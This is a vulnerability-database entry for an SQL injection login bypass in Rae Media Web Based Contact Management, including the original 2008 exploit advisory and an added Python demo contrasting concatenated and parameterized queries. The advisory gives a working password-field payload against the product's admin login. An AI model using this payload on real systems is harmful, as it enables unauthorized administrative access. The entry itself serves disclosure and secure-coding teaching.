https://www.exploit-db.com/exploits/7333
https://cxsecurity.com/issue/WLB-2009030114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-043
Aliensoftcorp Rae Media Web Based Contact Management 'asadmin/default.asp' SQL Injection Vulnerability

Vulnerability ID | 1116920 | Vulnerability type | SQL injection |
Published | 2008-12-03 | Updated | 2009-03-03 |
CVE-2008-6389 | CNNVD-200903-043 |
Platform | PHP | CVSS score | 7.5 |
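|Vulnerability source
|Vulnerability details
Rae Media Contact Management is a customer contact management system based on ASP and SQL Server. A SQL injection vulnerability exists in asadmin/default.asp in the SOHO, Standard, and Enterprise editions of Rae Media Contact Management Software. A remote attacker can execute arbitrary SQL commands via the password parameter.
|Exploit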
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability +
+ +
+ Discovered by b3hz4d +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
APA Center of Yazd University
(https://www.ircert.cc)
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE : 03 Dec 2008
SITE : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com
#####################################################
APPLICATION : Web Based Contact Management
DOWNLOAD(199$): http://www.aliensoftcorp.com/contactmanager.htm
VENDOR : http://www.aliensoftcorp.com/
DEMO : http://www.aliensoftcorp.com/contactmanager.htm
#####################################################
[+] vuln :
Admin login page
All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable.
All Demo links are here:
http://www.aliensoftcorp.com/contactmanager.htm
[+] Exploit :
USER: anything
PASS: delta' or 'a'='a
##########################################################################################################
# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #
##########################################################################################################
# milw0rm.com [2008-12-03]
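
The login bypass described above, modelled as an added example (not code from the product or from the advisory): a login check that concatenates the form values into the SQL text, beside one that binds them as parameters. The table schema, function names and sample credential are assumptions, and SQLite stands in for SQL Server so the block runs offline.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the admin account table (schema is assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    # Constructed sample account. Plaintext only to keep the example short;
    # a real application stores a salted password hash.
    db.execute("INSERT INTO admins VALUES ('admin', 's3cret-sample')")
    return db


def build_concatenated_sql(user, password):
    """Vulnerable pattern: form values become part of the SQL text."""
    return ("SELECT COUNT(*) FROM admins WHERE username = '" + user +
            "' AND password = '" + password + "'")


def login_concatenated(db, user, password):
    # A quote in the input ends the string literal, so the rest of the
    # input is parsed as SQL. AND binds tighter than OR, so a trailing
    # always-true OR term makes the WHERE clause match every row.
    return db.execute(build_concatenated_sql(user, password)).fetchone()[0] > 0


def login_parameterized(db, user, password):
    """Hardened pattern: values are bound as data and never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM admins WHERE username = ? AND password = ?"
    return db.execute(sql, (user, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    cases = [
        ("admin", "s3cret-sample"),         # valid credentials
        ("admin", "wrong"),                 # wrong password
        ("anything", "delta' or 'a'='a"),   # input from the advisory
    ]
    for user, pw in cases:
        print(repr(user), repr(pw))
        print("  query text   :", build_concatenated_sql(user, pw))
        print("  concatenated :", login_concatenated(db, user, pw))
        print("  parameterized:", login_parameterized(db, user, pw))
```
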
|References
Source: BID
Name: 32616
Link: http://www.securityfocus.com/bid/32616
Source: MILW0RM
Name: 7333
Link: http://www.milw0rm.com/exploits/7333
Source: SECUNIA
Name: 32988
Link: http://secunia.com/advisories/32988